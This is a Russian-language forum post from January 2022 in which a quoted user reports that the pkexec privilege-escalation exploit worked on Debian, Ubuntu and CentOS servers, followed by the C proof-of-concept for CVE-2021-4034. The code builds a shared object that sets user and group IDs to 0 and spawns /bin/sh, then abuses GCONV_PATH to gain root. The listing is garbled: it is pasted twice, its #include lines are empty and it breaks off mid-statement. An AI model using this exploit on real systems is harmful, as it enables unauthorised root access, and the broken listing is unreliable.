
  #7  
Старый 27.01.2022, 13:11
Ravenous

[QUOTE="dooble"]
dooble said:

У меня другие результаты, на доступных серверах - сработало везде (где есть pkexec), на debian, ubuntu, centos.
Проверял этим.
И патчил.
Spoiler: test
[CODE]
Code:
/*
* blasty-vs-pkexec.c -- by blasty
* ------------------------------------------------
* PoC for CVE-2021-4034, shout out to Qualys
*
* ctf quality exploit
*
* bla bla irresponsible disclosure
*
* -- blasty // 2022-01-25
*/

#include
#include
#include
#include
#include
#include
#include

/*
 * fatal -- print the perror() message labelled with f, then end the process
 * with exit status -1. Does not return.
 */
void fatal(char *f)
{
    const int status = -1;

    perror(f);
    exit(status);
}

/*
 * compile_so -- write the helper source text to ./payload.c and build it into
 * ./payload.so by running gcc through system().
 *
 * Takes no arguments and returns nothing. A failed fopen() ends the process
 * via fatal(); the results of fwrite(), fclose() and system() are not
 * checked, so a short write or a failed build goes unreported here.
 *
 * Defender's view: this step leaves payload.c and, if the build succeeds,
 * payload.so in the current working directory, and it starts gcc through the
 * command processor. Those files and a compiler run by an unprivileged
 * account are observable artifacts. The durable fix for CVE-2021-4034 is the
 * vendor's patched polkit package.
 */
void compile_so() {
/* "wb" creates or truncates payload.c in the current working directory. */
FILE *f = fopen("payload.c", "wb");
if (f == NULL) {
fatal("fopen");
}

/*
 * C source text for the shared object. As shown on this page the three
 * #include lines carry no header names -- NOTE(review): this looks like
 * extraction damage (angle-bracket text stripped); confirm against the
 * original listing. gconv() is an empty stub; gconv_init() sets
 * uid/euid/gid/egid to 0 and then replaces the process with /bin/sh under a
 * fixed PATH.
 */
char so_code[]=
"#include \n"
"#include \n"
"#include \n"
"void gconv() {\n"
" return;\n"
"}\n"
"void gconv_init() {\n"
" setuid(0); seteuid(0); setgid(0); setegid(0);\n"
" static char *a_argv[] = { \"sh\", NULL };\n"
" static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n"
" execve(\"/bin/sh\", a_argv, a_envp);\n"
" exit(0);\n"
"}\n";

/* One item of strlen(so_code) bytes, so the terminating NUL is not written. */
fwrite(so_code, strlen(so_code), 1, f);
fclose(f);

/* The return value of system() is ignored; a missing or failing gcc is not reported. */
system("gcc -o payload.so -shared -fPIC payload.c");
}

int main(int argc, char *argv[]) {
struct stat st;
char *a_argv[]={ NULL };
char *a_envp[]={
"lol",
"PATH=GCONV_PATH=.",
"LC_MESSAGES=en_US.UTF-8",
"XAUTHORITY=../LOL",
NULL
};

printf("[~] compile helper..\n");
compile_so();

if (stat("GCONV_PATH=.", &st)
* ------------------------------------------------
* PoC for CVE-2021-4034, shout out to Qualys
*
* ctf quality exploit
*
* bla bla irresponsible disclosure
*
* -- blasty // 2022-01-25
*/

#include
#include
#include
#include
#include
#include
#include

/*
 * fatal -- print the perror() message labelled with f, then end the process
 * with exit status -1. Does not return.
 */
void fatal(char *f)
{
    const int status = -1;

    perror(f);
    exit(status);
}

/*
 * compile_so -- write the helper source text to ./payload.c and build it into
 * ./payload.so by running gcc through system().
 *
 * Takes no arguments and returns nothing. A failed fopen() ends the process
 * via fatal(); the results of fwrite(), fclose() and system() are not
 * checked, so a short write or a failed build goes unreported here.
 *
 * Defender's view: this step leaves payload.c and, if the build succeeds,
 * payload.so in the current working directory, and it starts gcc through the
 * command processor. Those files and a compiler run by an unprivileged
 * account are observable artifacts. The durable fix for CVE-2021-4034 is the
 * vendor's patched polkit package.
 */
void compile_so() {
/* "wb" creates or truncates payload.c in the current working directory. */
FILE *f = fopen("payload.c", "wb");
if (f == NULL) {
fatal("fopen");
}

/*
 * C source text for the shared object. As shown on this page the three
 * #include lines carry no header names -- NOTE(review): this looks like
 * extraction damage (angle-bracket text stripped); confirm against the
 * original listing. gconv() is an empty stub; gconv_init() sets
 * uid/euid/gid/egid to 0 and then replaces the process with /bin/sh under a
 * fixed PATH.
 */
char so_code[]=
"#include \n"
"#include \n"
"#include \n"
"void gconv() {\n"
" return;\n"
"}\n"
"void gconv_init() {\n"
" setuid(0); seteuid(0); setgid(0); setegid(0);\n"
" static char *a_argv[] = { \"sh\", NULL };\n"
" static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n"
" execve(\"/bin/sh\", a_argv, a_envp);\n"
" exit(0);\n"
"}\n";

/* One item of strlen(so_code) bytes, so the terminating NUL is not written. */
fwrite(so_code, strlen(so_code), 1, f);
fclose(f);

/* The return value of system() is ignored; a missing or failing gcc is not reported. */
system("gcc -o payload.so -shared -fPIC payload.c");
}

int main(int argc, char *argv[]) {
struct stat st;
char *a_argv[]={ NULL };
char *a_envp[]={
"lol",
"PATH=GCONV_PATH=.",
"LC_MESSAGES=en_US.UTF-8",
"XAUTHORITY=../LOL",
NULL
};

printf("[~] compile helper..\n");
compile_so();

if (stat("GCONV_PATH=.", &st)
 